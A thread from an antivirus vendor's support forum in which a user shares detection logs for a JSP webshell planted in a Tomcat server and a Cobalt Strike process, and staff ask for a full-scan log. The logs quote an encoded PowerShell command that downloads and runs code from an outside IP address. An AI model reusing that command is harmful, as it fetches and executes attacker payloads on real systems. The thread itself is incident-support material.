火绒安全软件

标题: 病毒攻击没及时杀掉 [打印本页]

作者: vissh 时间: 昨天 12:03
标题: 病毒攻击没及时杀掉

病毒名称：Backdoor/JSP.WebShell.bh
病毒ID：F72F2DCBAC3D5C2C
病毒路径：E:\TRWfe\tomcat\webapps\trwfe\tippay.jsp
操作类型：修改
操作结果：已处理，删除文件

进程ID：4484
操作进程：E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行：e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID：652
父进程：C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2025-11-07 10:58:32,病毒防护,文件实时监控,发现病毒Backdoor/JSP.WebShell.bh, 已处理

病毒名称：Backdoor/JSP.WebShell.bh
病毒ID：F72F2DCBAC3D5C2C
病毒路径：E:\TRWfe\tomcat\webapps\trwfe\tippay4.jsp
操作类型：修改
操作结果：已处理，删除文件

进程ID：4484
操作进程：E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行：e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID：652
父进程：C:\Windows\System32\services.exe

病毒名称：Backdoor/CobaltStrike.l
病毒ID：7E662B652271E28F
虚拟地址：0x00000000C0450000
映像大小：4.0KB
是否完整映像：否
数据流哈希：cafbd78c
操作结果：处理成功，进程已结束
进程ID：1228
操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行：powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA
父进程ID：2904
父进程：C:\Windows\System32\cmd.exe
父进程命令行：cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA"

作者: 火绒运营专员 时间: 昨天 12:07
本帖最后由火绒运营专员于 2025-11-7 12:09 编辑

您好，您可以大概再描述一下问题嘛，

没及时杀掉

您的意思是此文件在你电脑中已经存在很久了，我们火绒今天才查杀？还是什么呢，您可以在描述一下您遇到的问题我们协助您一起处理一下。

作者: vissh 时间: 昨天 12:36

火绒运营专员发表于 2025-11-7 12:07
您好，您可以大概再描述一下问题嘛，
您的意思是此文件在你电脑中已经存在很久了，我们火绒今天才查杀？还 ...

已经被破坏了才被杀掉，已经两次了，全盘扫描又没有

作者: 火绒运营专员 时间: 昨天 12:40

vissh 发表于 2025-11-7 12:36
已经被破坏了才被杀掉，已经两次了，全盘扫描又没有

麻烦您提供下全盘查杀的安全日志这边看下呢~

作者: vissh 时间: 昨天 12:48

火绒运营专员发表于 2025-11-7 12:40
麻烦您提供下全盘查杀的安全日志这边看下呢~

【1】2025-09-15 14:34:46,病毒防护,病毒查杀,快速扫描, 发现0个风险项目

病毒库时间：2025-09-14 17:33
开始时间：2025-09-15 14:22
总计用时：00:06:33
扫描对象：15716
扫描文件：10327
发现风险：0
已处理风险：0

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

作者: 火绒运营专员 时间: 昨天 12:53

vissh 发表于 2025-11-7 12:48
【1】2025-09-15 14:34:46,病毒防护,病毒查杀,快速扫描, 发现0个风险项目

病毒库时间：2025-09-14 17:33 ...

您提供的是快速查杀日志，建议您使用火绒清空信任区后再完整全盘查杀操作下

欢迎光临火绒安全软件 (https://bbs.huorong.cn/)